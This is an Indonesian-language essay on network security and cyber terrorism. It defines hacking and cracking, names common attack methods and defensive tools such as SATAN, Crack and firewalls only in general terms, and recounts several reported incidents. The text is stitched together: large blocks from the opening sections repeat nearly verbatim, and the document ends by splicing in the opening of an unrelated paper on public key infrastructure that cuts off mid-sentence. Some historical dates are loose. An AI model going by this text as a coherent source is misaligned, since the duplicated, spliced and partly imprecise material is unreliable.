Terbukti dalam berbagai kasus terorisme seperti pada kasus pemboman Legian Oktober 2002 (Bom Bali I), selalu ada pihak-pihak yang memanfaatkan hal tersebut demi kepentingan atau tujuan politiknya. Bahkan sarana email telah dieksploitasi sebagai sarana komunikasi dalam tahap perencanaan sampai tahap pelaksanaan kegiatan pemboman tersebut. Dewasa ini banyak terdapat situs-situs (sites) yang tersembunyi (Underground sites) yang tidak terdaftar pada search engine manapun yang menawarkan beragam informasi dan utiliti program tentang network security yang dapat di downloaded secara gratis, kegunaannya untuk merusak atau mengacaukan sebuah sistim jaringan komputer. Namun seperti layaknya pertempuran abadi
antara kejahatan dan kebaikan, maka disisi lain pengetahuan untuk mengamankan sebuah jaringan komputer juga berkembang dengan pesat. Banyak situs di Internet yang juga menyediakan informasi dan utiliti program untuk mengamankan jaringan komputer, salah satu contohnya adalah Firewall. Hal ini membuktikan bahwa saat ini Internet & Computer Network Security menjadi pusat perhatian bagi para pengguna Internet baik ditinjau dari sisi kejahatan maupun sisi kebaikannya.
Perlunya Pengamanan Sistim Jaringan Komputer
Mengapa pengamanan jaringan komputer diperlukan? uraian berikut ini mungkin bisa menjawab pertanyaan tersebut secara sederhana dan masuk akal. Jawabannya adalah karena pada dasarnya kita semua menginginkan privasi, keamanan dan perasaan aman dalam hidup,termasuk dalam penggunaan jaringan komputer dan Internet. Kita mengharapkan hasil pekerjaan kita aman dan jauh dari kemungkinan dicuri, di copy atau dihapus. Kita juga menginginkan keamanan pada waktu saling berkirim email (electronic mail) tanpa khawatir ada pihak yang tidak bertanggung jawab (malicious users) membaca, merubah atau menghapus isi berita email tersebut. Dan terakhir, kita juga menginginkan keamanan saat melakukan transaksi pembelian lewat Internet tanpa rasa takut seseorang dapat mencuri informasi dalam kartu kredit kita sehingga
merugikan dikemudian hari.
Pengamanan Lewat Cara Pengaburan (Security Through Obscurity)
Sistim pengamanan dengan cara pengaburan atau membuat ketidakjelasan (obscurity) menggunakan prinsip bahwa suatu jaringan komputer hanya dapat diamankan sepanjang tidak ada pihak dari luar yang diperbolehkan mengetahui segala sesuatu tentang mekanisme internal dari jaringan tersebut. Sebuah filosofi yang sangat digemari oleh banyak komuniti, seperti di lingkungan militer, pemerintahan dan industri. Dengan menyembunyikan informasi tentang sistim jaringan tersebut diasumsikan atau dianggap bahwa semuanya sudah aman dari gangguan hackers atau serangan dari para cyber terrorist. Namun sebenarnya tidaklah demikian. Dewasa ini para hackers atau cyber terrorist telah mempunyai banyak pengalaman dan mengetahui secara gamblang cara menanggulangi suatu sistim jaringan komputer. Dengan mempelajari bagaimana sebuah sistim dan jaringan komputer bekerja, pada umumnya secara otodidak, ditambah dengan adanya pertukaran
informasi diantara sesama pengguna Internet melalui underground sites, disamping adanya keterbukaan dan standarisasi disain sistim komputer (open systems) semakin membuat cara pengamanan tersebut menjadi tidak efektif lagi.
Mengevaluasi Jaringan Komputer dari Serangan Cyber Terrorist dan Hackers
Secara teknis sangat sulit untuk mengevaluasi sebuah jaringan Komputer secara spesifik.Hal tersebut sangat tergantung dari banyak sekali faktor. Seperti misalnya, banyaknya jumlah pengguna atau clients dalam jaringan komputer dengan berbagai access points yang ada, atau model atau topology dari jaringannya sendiri serta versi dari operating systems nya, serta tergantung dari tingkat keahlian dan kemahiran serta pengetahuan dari system administrator atau network manager nya sendiri. Namun secara mudah dan sederhana ada sebuah cara untuk mengevaluasi aspek keamanan jaringan komputer, yaitu dengan memanfaatkan seluruh programprogram atau utilities peralatan hacking (hacking tools) yang terdapat di Internet. Kemudian
dilakukan uji coba kedalam jaringan komputer tersebut sehingga dapat terlihat nantinya seberapa parah dampak negatif atau kerusakan yang ditimbulkan. Beberapa program atau utility tersebut antara lain: IP scanner, IP sniffer, network analyzer, email bombs, spamming, TCP wrapper, password cracking dan sebagainya. Sehingga dengan cara seperti ini dapat segera diketahui tingkat kemampuan pengamanan jaringan komputer tersebut atau sering dikenal dengan istilah security holes atau back doors. Untuk kemudian dapat dengan segera diambil tindakan preventif dalam meningkatkan sistim keamanan jaringan komputer tersebut.
Sekilas Kegiatan Hacking dan Cracking
Secara umum kegiatan hacking adalah setiap usaha atau kegiatan diluar ijin atau sepengetahuan pemilik jaringan untuk memasuki sebuah jaringan serta mencoba mencuri files seperti file password dan sebagainya. Atau usaha untuk memanipulasi data, mencuri file-file penting atau mempermalukan orang lain dengan memalsukan user identity nya. Pelakunya disebut hacker yang terdiri dari seorang atau sekumpulan orang yang secara berkelanjutan berusaha untuk menembus sistim pengaman kerja dari operating system di suatu jaringan komputer. Para hacker yang sudah berpengalaman dapat dengan segera mengetahui kelemahan sistim pengamanan (security holes) dalam sebuah sistim jaringan komputer. Selain itu kebiasaan hacker adalah terus mencari pengetahuan baru atau target baru dan mereka akan saling menginformasikan satu sama
lainnya. Namun pada dasarnya para hacker sejati tidak pernah bermaksud untuk merusak data didalam jaringan tersebut, mereka hanya mencoba kemampuan untuk menaklukan suatu sistim keamanan komputer demi kepuasan tersendiri. Sedangkan seorang atau sekumpulan orang yang memang secara sengaja berniat untuk merusak dan menghancurkan integritas di seluruh jaringan sistim komputer disebut cracker, dan tindakannya dinamakan cracking. Pada umumnya para cracker setelah berhasil masuk kedalam jaringan komputer akan langsung melakukan kegiatan pengrusakan dan penghancuran data-data penting (destroying data) hingga menyebabkan kekacauan bagi para user dalam menggunakan komputernya. Kegiatan para cracker atau cyberterrorist ini mudah dikenali dan dapat segera diketahui dari dampak hasil kegiatan yang
mereka lakukan. Beberapa metode atau cara kerja yang sering digunakan para cyber terrorist dan hackers antara lain:
• Spoofing, yaitu sebuah bentuk kegiatan pemalsuan dimana seorang hacker atau cyber terrorist memalsukan (to masquerade) identitas seorang user hingga dia berhasil secara ilegal logon atau login kedalam satu jaringan komputer seolah-olah seperti user yang asli.
• Scanner, merupakan sebuah program yang secara otomatis akan mendeteksi kelemahan(security weaknesses) sebuah komputer di jaringan komputer lokal (local host) ataupun jaringan komputer dengan lokasi berjauhan (remote host). Sehingga dengan menggunakan program ini maka seorang hacker yang mungkin secara phisik berada di Inggris dapat dengan mudah menemukan security weaknesses pada sebuah server di Amerika atau dibelahan dunia lainnya termasuk di Indonesia tanpa harus meninggalkan ruangannya!.
• Sniffer, adalah kata lain dari Network Analyser yang berfungsi sebagai alat untuk memonitor jaringan komputer. Alat ini dapat dioperasikan hampir pada seluruh tipe protokol komunikasi data, seperti: Ethernet, TCP/IP, IPX dan lainnya.
• Password Cracker, adalah sebuah program yang dapat membuka enkripsi sebuah password atau sebaliknya malah dapat mematikan sistim pengamanan password itu sendiri.
• Destructive Devices, merupakan sekumpulan program-program virus yang dibuat khusus untuk melakukan penghancuran data-data, diantaranya Trojan horse, Worms, Email Bombs, Nukes dan lainnya.
Memproteksi Jaringan Komputer dari Ancaman Cyber Terrorist
Ada beberapa langkah dapat digunakan untuk memproteksi atau meningkatkan kemampuan proteksi sistim jaringan komputer, antara lain dengan merumuskan dan membuat sebuah kebijakan tentang sistim pengamanan yang handal (comprehensive security policy) serta menjelaskan kepada para pengguna tentang hak dan kewajiban mereka dalam menggunakan sistim jaringan komputer. Langkah selanjutnya, melakukan konsultasi dengan para pakar pengamanan sistim komputer untuk mendapatkan masukan yang professional tentang bagaimana meningkatkan kemampuan sistim pengamanan jaringan computer yang dimiliki. Melakukan
instalasi versi terbaru dari Software atau utility juga dapat membantu memecahkan permasalahan pengamanan jaringan komputer. Selain itu, mempekerjakan seorang sistim administrator jaringan yang telah berpengalaman akan dapat mengelola secara professional dan aman sistim jaringan computer tersebut. Kemudian selalu menggunakan mekanisme sistim otentifikasi terbaru dalam jaringan (advanced authentication mechanism) dan selalu gunakan teknik enkripsi dalam setiap melakukan transfer data atau komunikasi data. Yang tidak kalah pentingnya adalah menginstalasi sistim Firewall pada jaringan komputer untuk melindungi proxy server dari ancaman para cyber terrorist.
Peralatan Penangkal Cyber Terrorism
Network Manager atau System Administrator tentu memerlukan berbagai peralatan (tools) untuk membantu mengamankan jaringan komputernya. Beberapa tools bahkan memang dibuat khusus dalam rangka melakukan testing sistim jaringan untuk mengetahui kekuatan dan kelemahan dari sebuah sistim jaringan komputer. Tools tersebut antara lain:
• SATAN (Security Administrator’s Tool for Analysing Network), peralatan yang dibutuhkan untuk melakukan analisa sistim jaringan komputer secara menyeluruh sehingga performance sekaligus titik kelemahan dari jaringan komputer tersebut dapat diketahui.
• TCP Wrapper untuk memonitor jaringan komputer (trafficking) terutama dalam hal lalu lintas paket data dalam jaringan yang menggunakan protokol TCP/IP (internet protocol) sehingga paket data yang lewat dapat dipantau dengan baik.
• Crack untuk melakukan password security testing dimana manfaatnya untuk mengetahui kelemahan dari password para pengguna, karena tidak semua pengguna tahu cara membuat password yang aman. Bahkan ada yang tidak menggunakannya sama sekali!
• Firewall, adalah sebuah sistim proteksi untuk melaksanakan pengawasan lalu lintas paket data yang menuju atau meninggalkan sebuah jaringan komputer. Sehingga paket data yang telah diperiksa dapat diterima atau ditolak bahkan dimodifikasi terlebih dahulu sebelum memasuki atau meninggalkan jaringan tersebut.
Tips Mengamankan Jaringan Komputer
Walaupun peralatan untuk melakukan hacking tersedia dalam jumlah yang banyak namun tidak semua peralatan tersebut dapat dipergunakan secara efektif, bahkan beberapa peralatan tersebut sudah out of date saat ini, namun peralatan lainnya masih sangat ampuh untuk digunakan sebagai senjata penagkal. Sehingga peran dari seorang system administrator atau network manager sangat dominan dan dibutuhkan dalam mengamankan dan meningkatkan
kemampuan sistim keamanan jaringan komputer. Namun yang tidak kalah penting dan sering diabaikan para pengguna adalah melaksanakan back up data secara berkala (harian, mingguan atau bulanan) untuk mengantisipasi bila terjadi kerusakan atau kehilangan seluruh data penting yang disebabkan oleh serangan cyber terrorist. Sehingga dengan mudah dan cepat dapat dilakukan recovery seluruh sistim jaringan komputer tersebut. Kemudian para system administrator juga harus rajin menginformasikan kepada para pengguna (users) mengenai hak dan kewajiban dalam menggunakan jaringan. Para pengguna perlu diajari cara yang benar menggunakan jaringan komputer secara aman, seperti bagaimana cara membuat password yang baik dan sebagainya.
Perkembangan teknologi informasi yang sangat pesat merupakan kebutuhan pokok dalam
kehidupan manusia saat ini. Informasi yang didapat secara cepat, tepat dan akurat memainkan peranan sangat penting dalam berbagai aspek kehidupan manusia, seperti penentuan sebuah kebijaksanaan, sebagai alat bantu dalam proses pengambilan keputusan atau bahkan sebagai tren atau gaya hidup manusia modern. Kenyataannya semakin banyak kalangan bisnis, organisasi,perkantoran, pendidikan dan militer hingga individu yang menjadi sangat ketergantungan dengan fenomena zaman informasi ini. Sehingga munculah istilah yang sering dikenal dengan sebutan “the information age” atau abad informasi.
Pengertian Cyber Terrorism
Namun kenikmatan serta kemudahan yang ditawarkan abad informasi sekaligus mengundang para terorisme di dunia maya (cyber terrorism) untuk turut serta berpetualang didalamnya. Pengertian tentang cyber terrorism sebenarnya terdiri dari dua aspek yaitu cyber space dan terrorism, sementara para pelakunya disebut dengan cyber terrorists. Para hackers dan crackers juga dapat disebut dengan cyber terrorist, karena seringkali kegiatan yang mereka lakukan di dunia maya (Internet) dapat menteror serta menimbulkan kerugian yang besar terhadap korban yang menjadi targetnya, mirip seperti layaknya aksi terorisme. Keduanya mengeksploitasi dunia maya (internet) untuk kepentingannya masing-masing. Mungkin perbedaan tipis antara cyber terrorist dan hackers hanyalah pada motivasi dan tujuannya saja, dimana motivasi dari para cyber
terrorist adalah untuk kepentingan politik kelompok tertentu dengan tujuan memperlihatkan eksistensinya di panggung politik dunia. Sementara motivasi para hackers atau crackers adalah untuk memperlihatkan eksistensinya atau adu kepintaran untuk menunjukan superiotasnya di dunia maya dengan tujuan kepuasan tersendiri atau demi uang. Secara umum pengertian cyber terrorism adalah “suatu bentuk kegiatan terencana yang termotivasi secara politis yang berupa serangan terhadap informasi, sistim komputer, program komputer dan data sehingga engakibatkan kerugian besar serta jatuhnya korban tak berdosa yang dilakukan oleh satu
kelompok grup atau perorangan.”
Aksi Cyber Terrorism di Manca Negara
Berbagai potensi ancaman serius dapat ditimbulkan dari kegiatan para cyber terrorism, seperti melakukan serangan dan penetrasi terhadap sistim jaringan komputer serta infrastruktur telekomunikasi milik pemerintah, militer atau pihak lainnya yang dapat mengancam keselamatan kehidupan manusia. Beberapa contoh kegiatan cyber terrorist di manca negara antara lain, di Amerika Serikat, pada bulan Februari 1998 terjadi serangan (breaks-in or attack) sebanyak 60 kali perminggunya melalui media Internet terhadap 11 jaringan komputer militer di Pentagon. Dalam cyber attack ini yang menjadi target utama para cyber terrorist adalah Departemen Pertahanan Amerika Serikat (DoD). Di Srilanka, pada bulan Agustus 1997, sebuah organisasi yang bernama
the Internet Black Tigers yang berafiliasi kepada gerakan pemberontak Macan Tamil (the Liberation Tigers of Tamil Eelam) menyatakan bertanggung jawab atas kejahatan email (email bombing, email harrasment, email spoofing, etc.) yang menimpa beberapa kedutaan serta kantor perwakilan pemerintah Srilanka di manca negara. Tujuan akhirnya adalah kampanye untuk melepaskan diri dari Srilanka dalam memperjuangkan kemerdekaan rakyat Tamil. Di Cina, pada bulan Juli 1998, sebuah perkumpulan cyber terrorist atau crackers terkenal berhasil menerobos masuk ke pusat komputer sistim kendali satelit Cina dan berhasil mengacaukan “selama beberapa waktu” sistim kendali sebuah satelit milik Cina yang sedang mengorbit di ruang angkasa. Tujuan utama dari aksi ini adalah untuk melakukan protes terhadap gencarnya investasi negara barat di Cina. Di Swedia, pada bulan September 1998, pada saat kegiatan pemilihan umum, sejumlah cyber terrorist berhasil melakukan kegiatan sabotase yaitu merubah (defaced) tampilan website dari partai politik berhaluan kanan dan kiri. Dimana Website links partai politik tersebut dirubah tujuannya ke alamat situs-situs pornografi sehingga sangat merugikan partai karena kampanye partai secara elektronik melalui Internet menjadi terhambat. Di Indonesia sendiri, sekitar bulan Agustus 1997, cyber terrorist atau hackers dari Portugal pernah merubah (defacing) tampilan situs resmi dari Mabes ABRI (TNI), walaupun dengan segera dapat diantisipasi. Kemudian pada bulan April 2004 situs resmi milik KPU (Komisi Pemilihan Umum) jugu berhasil di hack dengan teknik defacing, namun dengan segera pelakunya yaitu seorang konsultan Teknologi Informasi suatu perusahaan di Jakarta dapat segera diamankan oleh pihak kepolisian. Namun sebenarnya masih banyak lagi
aktivitas para cyber terrorist di negara-negara lain yang masih berlangsung hingga saat ini.Beberapa analis menyatakan bahwa kegiatan cyber terrorism dewasa ini sudah dapat dikategorikan sebagai peperangan informasi berskala rendah (low-level information warfare) dimana dalam beberapa tahun mendatang mungkin sudah dianggap sebagai peperangan informasi yang sesungguhnya (the real information warfare). Seperti contoh pada saat perang Irak-AS,disana diperlihatkan bagaimana informasi telah diekploitasi sedemikian rupa mulai dari laporan peliputan TV, Radio sampai dengan penggunaan teknologi sistim informasi dalam cyber warfare untuk mendukung kepentingan komunikasi antar prajurit serta jalur komando dan kendali satuan tempur negara-negara koalisi dibawah pimpinan Amerika Serikat. Hal ini sudah dapat dikategorikan
sebagai aksi cyber warfare atau cyber information, dimana disinformasi serta kegiatan propaganda oleh pasukan koalisi menjadi salah satu bukti peruntuh moril pasukan Irak.
Cyber Terrorist dalam Sistim Jaringan Komputer
Berdasarkan hasil riset dan survey serta berbagai laporan tentang kejahatan komputer yang terjadi dewasa ini, diketahui bahwa saat ini tidak ada satupun jaringan komputer yang dapat diasumsikan 100% persen aman dari serangan virus komputer, spam, email bom dan sebagainya dari para hackers dan cyber terrorist. Seorang hacker atau cyber terrorist yang sudah berpengalaman dapat dengan mudah melakukan ‘breaks-in’ atau memasuki sistim jaringan komputer yang menjadi targetnya. Tidak perduli apakah didalam jaringan tersebut sudah mempunyai sistem pengamannya atau belum. Hal tersebut diperparah lagi dengan kenyataan
bahwa banyak sekali situs-situs bawah tanah (underground sites) dalam Internet yang menawarkan informasi serta pengetahuan tentang bagaimana menembus sebuah sistim jaringan komputer (penetrated) sekaligus mengelabui sistem pengamanannya (security compromised).
Informasi-informasi tersebut tersedia dalam bentuk kumpulan program, dokumentasi atau utiliti. Sehingga semakin memudahkan para cyber terrorist untuk melaksanakan niatnya terhadap target yang telah ditentukannya. Dengan memanfaatkan sistim informasi yang tersedia tersebut para cyberterrorist dapat menyampaikan “pesannya (messages)” ke seluruh dunia dengan cepat. Sudah berulangkali diadakan seminar, simposium serta diskusi-diskusi dengan topik utama mengenai pengamanan jaringan komputer. Banyak sekali pertanyaan yang sering bermunculan pada kesempatan tersebut, seperti: apakah jaringan komputer itu cukup aman?, apakah aman bila berbelanja lewat Internet tanpa khawatir seseorang mencuri informasi tentang kartu kredit kita?, apakah mungkin seseorang mengetahui password orang lain dan menggunakannnya tanpa
ketahuan?, dapatkah seseorang mencuri atau memanipulasi file-file orang lain?, dapatkah kita mempunyai sebuah jalur komunikasi yang aman di Internet? apa yang perlu dipelajari tentang sistim firewall, enkripsi, dekripsi, otentifikasi ? dsb. Untuk menjawab semua pertanyaan tersebut sangatlah tergantung dari tingkatan permasalahannya sendiri, yang sangat tergantung kepada setiap kasus yang terjadi. Tetapi yang jelas diperlukan adanya sistim pengamanan terhadap jaringan komputer yang tersedia.
Pengamanan jaringan komputer dahulu dan sekarang
Pada periode tahun ’70 an, jaringan komputer biasanya hanya terdapat di perusahaanperusahaan besar saja. Jaringan komputer tersebut saling menghubungkan setiap departemen dan setiap cabang ke sebuah pusat pengendalian (Central Control Point). Pada masa itu pengertian network security juga sudah ada, namun fokus utamanya hanya untuk kebutuhan para users didalam network itu sendiri (intranet) untuk meminimalkan tingkat resiko pengamanan (security risk). Pengetahuan serta informasi tentang bagaimana membobol sebuah jaringan komputer hanya diketahui oleh segelintir orang berprofesi khusus, seperti network consultant,
network administrator dan sebagainya. Sampai kemudian sebuah teknologi fenomenal bernama Internet muncul di tahun 1974, diprakarsai oleh Bob Taylor, direktur sebuah badan riset komputer Departemen Pertahanan Amerika (DoD/ Department of Defence) dalam sebuah proyek yang dinamakan ARPA (Advance
Research Project Agency). Pada awalnya proyek tersebut disiapkan untuk membangun jaringan komunikasi data antar pangkalan-pangkalan militer, beberapa universitas dan perusahaan yang tergabung dalam kontrak kerja dengan DoD. Saat ini, tiga dasarwarsa kemudian, jutaan pengguna diseluruh dunia sudah memanfaatkan teknologi tersebut. Namun selain membawa dampak yang sangat positif, Internet juga mempunyai dampak negatifnya. Seperti pengetahuan tentang membobol atau meng-crack satu jaringan komputer menjadi semakin maju. Materinya dapat diambil dari Internet lalu dipelajari bahkan langsung dipraktekkan, kebanyakan oleh para remaja dalam rangka “mencoba” ilmu yang telah didapatnya. Contohnya, hanya dengan mengetikkan kata hacking pada sebagian besar mesin pencari (search engine) seperti Yahoo, Google, Alta Vista,
Web Crawler dan sebagainya, setiap orang dapat dengan mudah mendapatkan informasi dan pengetahuan tentang hacking activities. Juga topik atau masalah yang dahulu diklasifikasikan rahasia atau sangat rahasia (top secret) seperti cara merakit bom atau bahan peledak atau merakit senjata api dan sebagainya sekarang bisa didapatkan di Internet hanya dengan meng “click” mouse di layar komputer.
Terbukti dalam berbagai kasus terorisme seperti pada kasus pemboman Legian Oktober 2002 (Bom Bali I), selalu ada pihak-pihak yang memanfaatkan hal tersebut demi kepentingan atau tujuan politiknya. Bahkan sarana email telah dieksploitasi sebagai sarana komunikasi dalam tahap perencanaan sampai tahap pelaksanaan kegiatan pemboman tersebut. Dewasa ini banyak terdapat situs-situs (sites) yang tersembunyi (Underground sites) yang tidak terdaftar pada search engine manapun yang menawarkan beragam informasi dan utiliti program tentang network security yang dapat di downloaded secara gratis, kegunaannya untuk merusak atau mengacaukan sebuah sistim jaringan komputer. Namun seperti layaknya pertempuran abadi
antara kejahatan dan kebaikan, maka disisi lain pengetahuan untuk mengamankan sebuah jaringan komputer juga berkembang dengan pesat. Banyak situs di Internet yang juga menyediakan informasi dan utiliti program untuk mengamankan jaringan komputer, salah satu contohnya adalah Firewall. Hal ini membuktikan bahwa saat ini Internet & Computer Network Security menjadi pusat perhatian bagi para pengguna Internet baik ditinjau dari sisi kejahatan maupun sisi kebaikannya.
Perlunya Pengamanan Sistim Jaringan Komputer
Mengapa pengamanan jaringan komputer diperlukan? uraian berikut ini mungkin bisa menjawab pertanyaan tersebut secara sederhana dan masuk akal. Jawabannya adalah karena pada dasarnya kita semua menginginkan privasi, keamanan dan perasaan aman dalam hidup,termasuk dalam penggunaan jaringan komputer dan Internet. Kita mengharapkan hasil pekerjaan kita aman dan jauh dari kemungkinan dicuri, di copy atau dihapus. Kita juga menginginkan keamanan pada waktu saling berkirim email (electronic mail) tanpa khawatir ada pihak yang tidak bertanggung jawab (malicious users) membaca, merubah atau menghapus isi berita email tersebut. Dan terakhir, kita juga menginginkan keamanan saat melakukan transaksi pembelian lewat Internet tanpa rasa takut seseorang dapat mencuri informasi dalam kartu kredit kita sehingga
merugikan dikemudian hari.
Pengamanan Lewat Cara Pengaburan (Security Through Obscurity)
Sistim pengamanan dengan cara pengaburan atau membuat ketidakjelasan (obscurity) menggunakan prinsip bahwa suatu jaringan komputer hanya dapat diamankan sepanjang tidak ada pihak dari luar yang diperbolehkan mengetahui segala sesuatu tentang mekanisme internal dari jaringan tersebut. Sebuah filosofi yang sangat digemari oleh banyak komuniti, seperti di lingkungan militer, pemerintahan dan industri. Dengan menyembunyikan informasi tentang sistim jaringan tersebut diasumsikan atau dianggap bahwa semuanya sudah aman dari gangguan hackers atau serangan dari para cyber terrorist. Namun sebenarnya tidaklah demikian. Dewasa ini para hackers atau cyber terrorist telah mempunyai banyak pengalaman dan mengetahui secara gamblang cara menanggulangi suatu sistim jaringan komputer. Dengan mempelajari bagaimana sebuah sistim dan jaringan komputer bekerja, pada umumnya secara otodidak, ditambah dengan adanya pertukaran
informasi diantara sesama pengguna Internet melalui underground sites, disamping adanya keterbukaan dan standarisasi disain sistim komputer (open systems) semakin membuat cara pengamanan tersebut menjadi tidak efektif lagi.
Mengevaluasi Jaringan Komputer dari Serangan Cyber Terrorist dan Hackers
Secara teknis sangat sulit untuk mengevaluasi sebuah jaringan Komputer secara spesifik.Hal tersebut sangat tergantung dari banyak sekali faktor. Seperti misalnya, banyaknya jumlah pengguna atau clients dalam jaringan komputer dengan berbagai access points yang ada, atau model atau topology dari jaringannya sendiri serta versi dari operating systems nya, serta tergantung dari tingkat keahlian dan kemahiran serta pengetahuan dari system administrator atau network manager nya sendiri. Namun secara mudah dan sederhana ada sebuah cara untuk mengevaluasi aspek keamanan jaringan komputer, yaitu dengan memanfaatkan seluruh programprogram atau utilities peralatan hacking (hacking tools) yang terdapat di Internet. Kemudian
dilakukan uji coba kedalam jaringan komputer tersebut sehingga dapat terlihat nantinya seberapa parah dampak negatif atau kerusakan yang ditimbulkan. Beberapa program atau utility tersebut antara lain: IP scanner, IP sniffer, network analyzer, email bombs, spamming, TCP wrapper, password cracking dan sebagainya. Sehingga dengan cara seperti ini dapat segera diketahui tingkat kemampuan pengamanan jaringan komputer tersebut atau sering dikenal dengan istilah security holes atau back doors. Untuk kemudian dapat dengan segera diambil tindakan preventif dalam meningkatkan sistim keamanan jaringan komputer tersebut.
Sekilas Kegiatan Hacking dan Cracking
Secara umum kegiatan hacking adalah setiap usaha atau kegiatan diluar ijin atau sepengetahuan pemilik jaringan untuk memasuki sebuah jaringan serta mencoba mencuri files seperti file password dan sebagainya. Atau usaha untuk memanipulasi data, mencuri file-file penting atau mempermalukan orang lain dengan memalsukan user identity nya. Pelakunya disebut hacker yang terdiri dari seorang atau sekumpulan orang yang secara berkelanjutan berusaha untuk menembus sistim pengaman kerja dari operating system di suatu jaringan komputer. Para hacker yang sudah berpengalaman dapat dengan segera mengetahui kelemahan sistim pengamanan (security holes) dalam sebuah sistim jaringan komputer. Selain itu kebiasaan hacker adalah terus mencari pengetahuan baru atau target baru dan mereka akan saling menginformasikan satu sama
lainnya. Namun pada dasarnya para hacker sejati tidak pernah bermaksud untuk merusak data didalam jaringan tersebut, mereka hanya mencoba kemampuan untuk menaklukan suatu sistim keamanan komputer demi kepuasan tersendiri. Sedangkan seorang atau sekumpulan orang yang memang secara sengaja berniat untuk merusak dan menghancurkan integritas di seluruh jaringan sistim komputer disebut cracker, dan tindakannya dinamakan cracking. Pada umumnya para cracker setelah berhasil masuk kedalam jaringan komputer akan langsung melakukan kegiatan pengrusakan dan penghancuran data-data penting (destroying data) hingga menyebabkan kekacauan bagi para user dalam menggunakan komputernya. Kegiatan para cracker atau cyberterrorist ini mudah dikenali dan dapat segera diketahui dari dampak hasil kegiatan yang
mereka lakukan. Beberapa metode atau cara kerja yang sering digunakan para cyber terrorist dan hackers antara lain:
• Spoofing, yaitu sebuah bentuk kegiatan pemalsuan dimana seorang hacker atau cyber terrorist memalsukan (to masquerade) identitas seorang user hingga dia berhasil secara ilegal logon atau login kedalam satu jaringan komputer seolah-olah seperti user yang asli.
• Scanner, merupakan sebuah program yang secara otomatis akan mendeteksi kelemahan(security weaknesses) sebuah komputer di jaringan komputer lokal (local host) ataupun jaringan komputer dengan lokasi berjauhan (remote host). Sehingga dengan menggunakan program ini maka seorang hacker yang mungkin secara phisik berada di Inggris dapat dengan mudah menemukan security weaknesses pada sebuah server di Amerika atau dibelahan dunia lainnya termasuk di Indonesia tanpa harus meninggalkan ruangannya!.
• Sniffer, adalah kata lain dari Network Analyser yang berfungsi sebagai alat untuk memonitor jaringan komputer. Alat ini dapat dioperasikan hampir pada seluruh tipe protokol komunikasi data, seperti: Ethernet, TCP/IP, IPX dan lainnya.
• Password Cracker, adalah sebuah program yang dapat membuka enkripsi sebuah password atau sebaliknya malah dapat mematikan sistim pengamanan password itu sendiri.
• Destructive Devices, merupakan sekumpulan program-program virus yang dibuat khusus untuk melakukan penghancuran data-data, diantaranya Trojan horse, Worms, Email Bombs, Nukes dan lainnya.
Memproteksi Jaringan Komputer dari Ancaman Cyber Terrorist
Ada beberapa langkah dapat digunakan untuk memproteksi atau meningkatkan kemampuan proteksi sistim jaringan komputer, antara lain dengan merumuskan dan membuat sebuah kebijakan tentang sistim pengamanan yang handal (comprehensive security policy) serta menjelaskan kepada para pengguna tentang hak dan kewajiban mereka dalam menggunakan sistim jaringan komputer. Langkah selanjutnya, melakukan konsultasi dengan para pakar pengamanan sistim komputer untuk mendapatkan masukan yang professional tentang bagaimana meningkatkan kemampuan sistim pengamanan jaringan computer yang dimiliki. Melakukan
instalasi versi terbaru dari Software atau utility juga dapat membantu memecahkan permasalahan pengamanan jaringan komputer. Selain itu, mempekerjakan seorang sistim administrator jaringan yang telah berpengalaman akan dapat mengelola secara professional dan aman sistim jaringan computer tersebut. Kemudian selalu menggunakan mekanisme sistim otentifikasi terbaru dalam jaringan (advanced authentication mechanism) dan selalu gunakan teknik enkripsi dalam setiap melakukan transfer data atau komunikasi data. Yang tidak kalah pentingnya adalah menginstalasi sistim Firewall pada jaringan komputer untuk melindungi proxy server dari ancaman para cyber terrorist.
Peralatan Penangkal Cyber Terrorism
Network Manager atau System Administrator tentu memerlukan berbagai peralatan (tools) untuk membantu mengamankan jaringan komputernya. Beberapa tools bahkan memang dibuat khusus dalam rangka melakukan testing sistim jaringan untuk mengetahui kekuatan dan kelemahan dari sebuah sistim jaringan komputer. Tools tersebut antara lain:
• SATAN (Security Administrator’s Tool for Analysing Network), peralatan yang dibutuhkan untuk melakukan analisa sistim jaringan komputer secara menyeluruh sehingga performance sekaligus titik kelemahan dari jaringan komputer tersebut dapat diketahui.
• TCP Wrapper untuk memonitor jaringan komputer (trafficking) terutama dalam hal lalu lintas paket data dalam jaringan yang menggunakan protokol TCP/IP (internet protocol) sehingga paket data yang lewat dapat dipantau dengan baik.
• Crack untuk melakukan password security testing dimana manfaatnya untuk mengetahui kelemahan dari password para pengguna, karena tidak semua pengguna tahu cara membuat password yang aman. Bahkan ada yang tidak menggunakannya sama sekali!
• Firewall, adalah sebuah sistim proteksi untuk melaksanakan pengawasan lalu lintas paket data yang menuju atau meninggalkan sebuah jaringan komputer. Sehingga paket data yang telah diperiksa dapat diterima atau ditolak bahkan dimodifikasi terlebih dahulu sebelum memasuki atau meninggalkan jaringan tersebut.
Tips Mengamankan Jaringan Komputer
Walaupun peralatan untuk melakukan hacking tersedia dalam jumlah yang banyak namun tidak semua peralatan tersebut dapat dipergunakan secara efektif, bahkan beberapa peralatan tersebut sudah out of date saat ini, namun peralatan lainnya masih sangat ampuh untuk digunakan sebagai senjata penagkal. Sehingga peran dari seorang system administrator atau network manager sangat dominan dan dibutuhkan dalam mengamankan dan meningkatkan
kemampuan sistim keamanan jaringan komputer. Namun yang tidak kalah penting dan sering diabaikan para pengguna adalah melaksanakan back up data secara berkala (harian, mingguan atau bulanan) untuk mengantisipasi bila terjadi kerusakan atau kehilangan seluruh data penting yang disebabkan oleh serangan cyber terrorist. Sehingga dengan mudah dan cepat dapat dilakukan recovery seluruh sistim jaringan komputer tersebut. Kemudian para system administrator juga harus rajin menginformasikan kepada para pengguna (users) mengenai hak dan kewajiban dalam menggunakan jaringan. Para pengguna perlu diajari cara yang benar menggunakan jaringan komputer secara aman, seperti bagaimana cara membuat password yang baik dan sebagainya.
Public Key Infrastructure dan Open Source
Avinanta Tarigan, SKom1 - I Made Wiryana, SSi, SKom, MSc2
1. Konsep security
Internet awalnya dikembangkan untuk menghubungkan antar pihak yang saling
dipercaya dengan tujuan saling bertukar menukar informasi. Walau merupakan
proyek Departemen Pertahanan Amerika, Internet digunakan dan dikembangkan
untuk tujuan kolaborasi dunia akademi yang serba terbuka. Sehingga pada awal
perkembangannya masalah privacy bukanlah merupakan hal yang besar. Bahkan
pada era awal Internet, sering dengan sengaja orang memberikan informasi
pribadinya kepada rekan kerjanya di benua lain. Saat itu pengguna sering
memberikan informasi mengenai dirinya melalui file .plan ataupun .project.
Juga melalui informasi yang didapat dari jasa finger yang dapat melaporkan
